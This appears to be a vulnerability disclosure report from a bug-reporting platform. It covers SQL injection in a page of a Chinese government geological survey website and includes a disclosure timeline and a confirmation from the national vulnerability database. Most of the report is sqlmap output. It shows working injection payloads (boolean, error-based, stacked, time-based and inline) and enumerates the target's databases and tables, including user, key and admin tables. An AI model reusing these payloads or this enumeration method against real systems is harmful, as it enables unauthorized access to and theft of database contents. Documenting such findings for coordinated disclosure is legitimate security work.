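2015-11-01: Details reported to the vendor; awaiting vendor handling
2015-11-05: Vendor confirmed; details disclosed to the vendor only
2015-11-15: Details disclosed to core white hats and experts in related fields
2015-11-25: Details disclosed to regular white hats
2015-12-05: Details disclosed to intern white hats
2015-12-20: Details disclosed to the public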
TS
Center for Hydrogeology and Environmental Geology Survey, China Geological Survey
http://**.**.**.**/AchievementProjectView.aspx?id=30 (GET)
sqlmap identified the following injection points with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=30 AND 3696=3696

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=30 AND 7660=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7660=7660) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(112)+CHAR(113)))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=30; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=30 WAITFOR DELAY '0:0:5'--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1260=1260) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(112)+CHAR(113))
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
available databases [7]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] WaiWang

Database: ReportServerTempDB
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| dbo.DBUpgradeHistory         | 27      |
+------------------------------+---------+

Database: ReportServer
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| dbo.DBUpgradeHistory         | 31      |
| dbo.ConfigurationInfo        | 23      |
| dbo.Roles                    | 8       |
| dbo.PolicyUserRole           | 4       |
| dbo.Users                    | 3       |
| dbo.Keys                     | 2       |
| dbo.Policies                 | 2       |
| dbo.SecData                  | 2       |
| dbo.ServerUpgradeHistory     | 2       |
| dbo.Catalog                  | 1       |
| dbo.UpgradeInfo              | 1       |
+------------------------------+---------+

Database: WaiWang
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| dbo.news_photo               | 1945    |
| dbo.news_info                | 1818    |
| dbo.View_news_info           | 1818    |
| dbo.Achievement_periodical   | 468     |
| dbo.news_file                | 295     |
| dbo.Achievement_manual_part  | 228     |
| dbo.Achievement_info_photo   | 58      |
| dbo.sys_role_right           | 58      |
| dbo.sys_menu                 | 42      |
| dbo.Achievement_info         | 27      |
| dbo.sys_adm                  | 13      |
| dbo.sys_role                 | 12      |
| dbo.news_video               | 9       |
| dbo.news_zhuanti             | 5       |
| dbo.Achievement_project      | 4       |
| dbo.View_achievement_project | 4       |
| dbo.Achievement_papers       | 3       |
| dbo.Achievement_manual       | 2       |
| dbo.sys_adm_role             | 2       |
| dbo.Achievement_map          | 1       |
+------------------------------+---------+
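Severity: High
Vulnerability Rank: 10
Confirmed at: 2015-11-05 14:21
CNVD confirmed and reproduced the reported issue and has forwarded it via CNCERT to the China Earthquake Survey Bureau, which will coordinate follow-up handling with the organization that manages the website.
None yet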